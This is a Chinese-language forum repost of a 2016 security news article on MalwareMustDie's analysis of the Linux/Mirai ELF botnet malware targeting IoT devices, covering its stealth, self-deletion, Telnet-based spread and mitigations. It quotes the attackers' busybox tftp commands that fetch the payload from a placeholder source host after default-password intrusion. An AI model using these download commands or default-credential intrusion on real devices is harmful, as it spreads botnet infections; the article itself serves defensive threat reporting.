请选择 进入手机版 | 继续访问电脑版
    查看: 581|回复: 0

    Linux/Mirai ELF :专门攻击物联网设备的恶意软件

    [复制链接]

    6544

    主题

    6303

    帖子

    6230

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    6230
    基情
    -78
    发表于 2016-9-7 19:32:11 | 显示全部楼层 |阅读模式


        E安全9月7日讯 MalwareMustDie的专家发现了一款名为“ELF Linux/Mirai”的新型ELF木马后门,正针对物联网设备展开攻击。

        MalwareMustDie专家八月分析了一个特殊的ELF木马后门样本—被称为ELF Linux/Mirai,目前该木马后门正针对物联网设备。这款恶意软件的名称与二进制“mirai.*”相同。据专家称,该恶意软件已发动数起攻击。

        VirusTotal在线扫描服务公司证实,ELF Linux/Mirai十分隐秘,许多杀毒解决方案仍无法检测到,检测率极低。

        MalwareMustDie博客中一份分析报告指出,“缺乏检测的原因在于缺乏样本,难以从受感染的物联网设备、路由器、DVR或WebIP摄像头和嵌入式平台中带有Busybox二进制的Linux中获取样本。”

        Security Affairs检测的最后一个EFL为Linux木马Linux.PNScan,这款木马活跃针对x86 Linux路由器,设法安装后门。

        但MalwareMustDie透露,Linux/Mirai比PnSan大得多。

        分析指出,“这种威胁于8月初浮出水面,尽管这个ELF不易被检测,因为在安装后不会马上显示软件活动:只是静静待在这里,不会在系统中残留恶意软件,除了恶意软件运行的延迟过程外,所有文件均被删除。”

        这就意味着当感染成功,难以通过未受感染的系统区分受感染的系统,除了内存分析。我们讨论的是一类不易分析并调试的设备。起初,对文件系统或外部网络流量的普通分析无法提供任何证据。

        物联网环境不利。物联网塑造着新一类强大的僵尸网络,扩散至全球。哪个国家更易遭受此类攻击?

        “具有Linux busybox嵌入式联网设备的国家,例如DVR或Web网络摄像头;以及通过在全球IP地址运行的Linux路由器为用户提供ISP服务的国家更易成为这类攻击的目标,尤其,未保护Telnet远程端口服务(Tcp/23)访问安全的设备或服务。”

        “Linux/Mirai开发人员成功编码字符串并将流量分流来伪装自己。”

        对于所有系统管理员最重要的是防御这类感染:与好朋友一起参与开放式过滤系统,安全工程师正努力推动—MalwareMustDie—正确的过滤签名提醒系统管理员是否遭受这类攻击威胁。在一个试点中,具有正确签名的系统管理员发现,仅仅几天内,攻击来源就有数百个地址。

        似乎感染在扩散,僵尸网络似乎非常广泛。

        这时,所有想要保护系统的系统管理员应当参看以下缓解措施:

        如果你具有物联网设备,请确保未打开telnet服务,该服务未运行。

        如果你未使用TCP/48101端口,请禁用,免于遭受感染和进一步损害。

        监控telnet连接,因为用户感染的僵尸网络协议为Telnet服务。

        逆向过程,寻找MalwareMustDie检测工具提示中报告的字符串。

        然而,我们确切地知道Linux/Mirai ELF恶意软件,但为什么恶意软件分析专家却不热衷分析这款恶意软件?

        MalwareMustDie表示,“很多人不知道此款恶意软件的原因在于杀毒专家认为它是Gafgyt或Bashlite或Bashdoor的变种。另外,此款软件的真实样本难以获取,因为许多恶意软件分析专家必须在受感染的设备内存上提取,或者入侵CNC获取。”

        这就意味着,如果我们关掉受感染的设备,取证分析难上加难:所有信息会丢失,并且可能需要新的感染程序重新启动。

        之前的ELF恶意软件版本之间的最大不同点是什么?

        MalwareMustDie指出,“相比过去的类似威胁,攻击者目前具有不同策略—尽量潜伏(延缓)、不被检测(AV或流量过滤器中的低检测率)、不可见(未追踪,也没有样本提取)、加密ELF的ASCII数据,保密分布。但很明显,攻击者的主要目的仍是DDoS僵尸网络,以通过他们所谓的Telnet扫描器快速将感染扩散至物联网设备。”

        这款ELF真正隐秘地方在于,唯一的追踪途径是从运行的设备中提取内存。

        感染模式 攻击者通过SSH或Telnet账号利用已知漏洞或使用默认密码入侵物联网设备。

        如果以现有设备的感染条件作为目标,这类ELF使用特定的技术分叉(fork)新的进程,否则节点即为安全,安装不会继续。

        一旦获取设备的外壳访问,攻击者将下载ELF Linux/Mirai恶意软件的有效荷载,下方为在物联网设备上执行操作的命令:

        ‘busybox tftp‘ -r [MalwareFile] -g [IPsource]

        ‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

        难以分析Linux/Mirai感染,原因在于一旦执行,恶意软件还能删除痕迹。

        MalwareMustDie团队表示,“Linux/Mirai感染的某些情况表明,该恶意软件在没有参数的情况下执行;某些情况下,执行后会删除下载的恶意软件文件。这种情况下,通常无法获取样本,除非将恶意软件过程转储至ELF二进制。这就是难以获取这种新型威胁样本的原因。”

        “一经执行,该恶意软件将自行删除,避免留下踪迹,但进程仍在运行。”在lsof中能看见的一些物联网设备或带有特定PID的/proc列表,也就是:

        /proc/{PID}/exe - ‘/dev/.{something}/dvrHelper’ (删除)

        /proc/{PID}/exe - ‘./{长字母字符串}’ alphabet (删除)

        进程运行的同时,恶意软件还打开PF_INET(TCP的UNIX网络套接字),并将它绑定到本地主机IP地址127.0.0.1的端口TCP/48101,之后开始侦听连入连接。这款恶意软件通过新进程PID分叉新进程。受感染的设备将在其它设备的Telnet服务上进行连接,进一步实施滥用行为。

        E安全注:本文系E安全编辑报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com

        @E安全,最专业的前沿网络安全媒体和产业服务平台,每日提供优质全球网络安全资讯与深度思考,欢迎关注微信公众号「E安全」(EAQapp),或登E安全门户网站www.easyaq.com , 查看更多精彩内容。

                                                                            阅读原文

                                                       


    上一篇:学习LINUX你要知道这些
    下一篇:Android 手机屏幕也有震动反馈了,但是……
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|网站地图|DZ商业模板|VR福利资源|嵌入式Linux论坛 ( 粤ICP备15085165号-2

    GMT+8, 2017-2-28 13:38 , Processed in 0.708041 second(s), 43 queries .

    Powered by 深嵌论坛 X3.2

    © 2001-2013 Comsenz Inc.

    快速回复 返回顶部 返回列表